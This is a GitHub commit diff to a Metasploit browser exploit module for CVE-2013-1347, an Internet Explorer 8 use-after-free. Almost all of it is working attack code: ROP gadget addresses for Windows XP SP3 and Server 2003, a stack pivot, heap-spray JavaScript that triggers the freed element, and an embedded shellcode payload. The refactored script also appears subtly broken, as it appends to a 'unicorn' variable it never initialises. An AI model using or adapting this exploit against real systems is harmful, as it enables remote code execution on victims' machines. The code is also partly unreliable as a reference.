Skip to content

Commit c7609ac

Browse files
wchen-r7wchen-r7
committed
Initial update
1 parent fff8593 commit c7609ac

File tree

1 file changed

+48
-69
lines changed

1 file changed

+48
-69
lines changed

modules/exploits/windows/browser/ie_cgenericelement_uaf.rb

Lines changed: 48 additions & 69 deletions
Original file line numberDiff line numberDiff line change
@@ -48,6 +48,7 @@ def initialize(info={})
4848
[
4949
[ 'CVE', '2013-1347' ],
5050
[ 'OSVDB', '92993' ],
51+
[ 'US-CERT-VU', '237655' ],
5152
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
5253
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
5354
],
@@ -114,67 +115,12 @@ def get_target(agent)
114115
return nil
115116
end
116117

117-
def ie8_smil(my_target, p)
118-
119-
case my_target['Rop']
120-
when :msvcrt
121-
case my_target.name
122-
when 'IE 8 on Windows XP SP3'
123-
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
124-
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
125-
when 'IE 8 on Windows Server 2003'
126-
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
127-
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
128-
end
129-
else
130-
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
131-
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
132-
end
133-
134-
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
135-
js_payload = Rex::Text.to_unescape(p)
136-
137-
js = %Q|
138-
unicorn = unescape("ABCD");
139-
unicorn2 = unescape("EEEE");
140-
for (i=0; i < 2; i++) {
141-
unicorn += unescape("ABCD");
142-
}unicorn += unescape("AB");
143-
144-
unicorn += unescape("#{js_payload}");
145-
146-
animvalues = unescape("#{align_esp}");
147-
148-
for (i=0; i < 0x70/4; i++) {
149-
if (i == 0x70/4-1) {
150-
animvalues += unescape("#{xchg_esp}");
151-
}
152-
else {
153-
animvalues += unescape("#{align_esp}");
154-
}
155-
}
156-
157-
animvalues += unicorn;
158-
159-
for(i = 0; i < 13; i++) {
160-
animvalues += ";red";
161-
}
162-
|
163-
164-
if datastore['OBFUSCATE']
165-
js = ::Rex::Exploitation::JSObfu.new(js)
166-
js.obfuscate
167-
end
168-
169-
return js
170-
end
171-
172118
def junk(n=4)
173-
return rand_text_alpha(n).unpack("V")[0].to_i
119+
rand_text_alpha(n).unpack("V")[0].to_i
174120
end
175121

176122
def nop
177-
return make_nops(4).unpack("V")[0].to_i
123+
make_nops(4).unpack("V")[0].to_i
178124
end
179125

180126
def get_payload(t, cli)
@@ -280,9 +226,24 @@ def get_payload(t, cli)
280226
end
281227

282228
def load_exploit_html(my_target, cli)
229+
case my_target['Rop']
230+
when :msvcrt
231+
case my_target.name
232+
when 'IE 8 on Windows XP SP3'
233+
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
234+
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
235+
when 'IE 8 on Windows Server 2003'
236+
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
237+
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
238+
end
239+
else
240+
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
241+
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
242+
end
243+
244+
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
245+
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
283246

284-
p = get_payload(my_target, cli)
285-
js = ie8_smil(my_target, p)
286247

287248
html = %Q|
288249
<!doctype html>
@@ -293,9 +254,10 @@ def load_exploit_html(my_target, cli)
293254
</meta>
294255
295256
<script>
257+
#{js_mstime_malloc}
258+
296259
function helloWorld()
297260
{
298-
#{js}
299261
f0 = document.createElement('span');
300262
document.body.appendChild(f0);
301263
f1 = document.createElement('span');
@@ -306,21 +268,38 @@ def load_exploit_html(my_target, cli)
306268
f2.appendChild(document.createElement('datalist'));
307269
f1.appendChild(document.createElement('span'));
308270
f1.appendChild(document.createElement('table'));
309-
try{
310-
f0.offsetParent=null;
311-
}catch(e) {
312271
313-
}f2.innerHTML="";
272+
try { f0.offsetParent=null;}
273+
catch(e) { }
274+
275+
f2.innerHTML = "";
314276
f0.appendChild(document.createElement('hr'));
315-
f1.innerHTML="";
277+
f1.innerHTML = "";
316278
317279
CollectGarbage();
318280
319-
try {
320-
a = document.getElementById('myanim');
321-
a.values = animvalues;
281+
hd = unescape("ABCD");
282+
for (i=0; i < 2; i++) {
283+
unicorn += unescape("ABCD");
322284
}
323-
catch(e) {}
285+
unicorn += unescape("AB");
286+
287+
unicorn += unescape("#{js_payload}");
288+
289+
animvalues = unescape("#{align_esp}");
290+
291+
for (i=0; i < 0x70/4; i++) {
292+
if (i == 0x70/4-1) {
293+
animvalues += unescape("#{xchg_esp}");
294+
}
295+
else {
296+
animvalues += unescape("#{align_esp}");
297+
}
298+
}
299+
300+
animvalues += unicorn;
301+
302+
mstime_malloc({shellcode:animvalues, heapBlockSize:0x38, objId:"myanim"});
324303
}
325304
326305
</script>

0 commit comments

Comments
 (0)